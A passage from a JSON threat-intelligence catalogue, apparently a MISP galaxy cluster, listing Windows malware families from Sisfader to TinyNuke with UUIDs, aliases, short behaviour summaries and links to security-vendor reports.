"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" ], "synonyms": [], "type": [] }, "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", "value": "Sisfader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", "http://malware-traffic-analysis.net/2017/11/23/index.html" ], "synonyms": [], "type": [] }, "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", "value": "Skarab Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" ], "synonyms": [], "type": [] }, "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", "value": "Skyplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", "value": "Slave" }, { "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", "https://securelist.com/apt-slingshot/84312/", "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" ], "synonyms": [], "type": [] }, "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" ], "synonyms": [ "speccom" ], "type": [] }, "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/" ], "synonyms": [ "Dofoil" ], "type": [] }, "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", "value": "SmokeLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [ "Ismo" ], "type": [] }, "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", "value": "Smominru" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32", "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/", "https://www.youtube.com/watch?v=7gCU31ScJgk" ], "synonyms": [], "type": [] }, "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", "value": "Smrss32 Ransomware" }, { "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" ], "synonyms": [], "type": [] }, "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", "value": "SnatchLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [ "ByeByeShell" ], "type": [] }, "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", "value": "SNEEPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" ], "synonyms": [ "Ursnif" ], "type": [] }, "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", "value": "Snifula" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" ], "synonyms": [], "type": [] }, "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", "value": "Snojan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" ], "synonyms": [], "type": [] }, "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", "value": "SNS Locker" }, { "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", "value": "Sobaken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" ], "synonyms": [], "type": [] }, "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", "value": "Socks5 Systemz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" ], "synonyms": [ "BIRDDOG", "Nadrac" ], "type": [] }, "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", "value": "SocksBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" ], "synonyms": [ "Napolar" ], "type": [] }, "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", "value": "Solarbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" ], "synonyms": [], "type": [] }, "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", "value": "soraya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", "value": "Sorgu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" ], "synonyms": [ "denis" ], "type": [] }, "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", "value": "Spedear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", "https://github.com/MinervaLabsResearch/SporaVaccination", "http://malware-traffic-analysis.net/2017/01/17/index2.html" ], "synonyms": [], "type": [] }, "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", "value": "Spora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" ], "synonyms": [], "type": [] }, "uuid": "34e9d701-22a1-4315-891d-443edd077abf", "value": "SpyBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" ], "synonyms": [], "type": [] }, "uuid": "552745f4-6702-47a5-b517-9b099937573f", "value": "win.spynet_rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" ], "synonyms": [], "type": [] }, "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", "value": "SquirtDanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "009db412-762d-4256-8df9-eb213be01ffd", "value": "SslMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" ], "synonyms": [], "type": [] }, "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", "value": "Stabuniq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" ], "synonyms": [], "type": [] }, "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", "value": "Stampedo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", "https://securelist.com/operation-daybreak/75100/" ], "synonyms": [], "type": [] }, "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", "value": "StarCruft" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", "value": "StarLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" ], "synonyms": [], "type": [] }, "uuid": "aea21616-061d-4177-9512-8887853394ed", "value": "StegoLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" ], "synonyms": [], "type": [] }, "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" ], "synonyms": [], "type": [] }, "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", "value": "Stration" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" ], "synonyms": [], "type": [] }, "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", "value": "Stresspaint" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" ], "synonyms": [], "type": [] }, "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", "value": "StrongPity" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", "value": "Stuxnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" ], "synonyms": [], "type": [] }, "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", "value": "SunOrcal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" ], "synonyms": [], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", "value": "SuppoBox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", "value": "Swift?" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", "value": "Sword" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://community.rsa.com/thread/185437", "https://www.symantec.com/connect/blogs/sykipot-attacks" ], "synonyms": [ "getkys" ], "type": [] }, "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", "value": "sykipot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" ], "synonyms": [], "type": [] }, "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", "value": "SynAck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" ], "synonyms": [], "type": [] }, "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", "value": "SyncCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", "value": "SynFlooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" ], "synonyms": [], "type": [] }, "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", "value": "Synth Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", "value": "Sys10" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" ], "synonyms": [], "type": [] }, "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", "value": "Syscon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", "value": "SysGet" }, { "description": "Sysraw stealer got its name because at some point, it was started as \"ZSysRaw\\sysraw.exe\". PDB strings suggest the name \"Clipsa\" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named \"1?[-+].dat\" and POSTs them.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer", "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" ], "synonyms": [ "Clipsa" ], "type": [] }, "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", "value": "Sysraw Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" ], "synonyms": [], "type": [] }, "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", "value": "SysScan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi" ], "synonyms": [], "type": [] }, "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", "value": "Szribi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", "value": "TabMsgSQL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" ], "synonyms": [ "simbot" ], "type": [] }, "uuid": "94323b32-9566-450b-8480-5f9f53b57948", "value": "taidoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" ], "synonyms": [], "type": [] }, "uuid": "b0467c03-824f-4071-8668-f056110d2a50", "value": "Taleret" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" ], "synonyms": [], "type": [] }, "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", "value": "Tandfuy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" ], "synonyms": [], "type": [] }, "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", "value": "Tapaoux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", "value": "Tarsip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" ], "synonyms": [], "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", "value": "tDiscoverer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] }, "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", "value": "TeleBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", "value": "TeleDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" ], "synonyms": [], "type": [] }, "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", "value": "Tempedreve" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf" ], "synonyms": [ "Fakem RAT" ], "type": [] }, "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", "https://blogs.cisco.com/security/talos/teslacrypt", "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" ], "synonyms": [ "cryptesla" ], "type": [] }, "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", "value": "TeslaCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" ], "synonyms": [ "Alphabot" ], "type": [] }, "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", "value": "Thanatos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/" ], "synonyms": [], "type": [] }, "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", "value": "Thanatos Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", "value": "ThreeByte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", "value": "ThumbThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" ], "synonyms": [], "type": [] }, "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", "value": "Thunker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/" ], "synonyms": [], "type": [] }, "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", "value": "Tidepool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "http://garage4hackers.com/entry.php?b=3086", "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" ], "synonyms": [ "Illi", "TinyBanker", "Zusy" ], "type": [] }, "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", "value": "Tinba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" ], "synonyms": [], "type": [] }, "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject 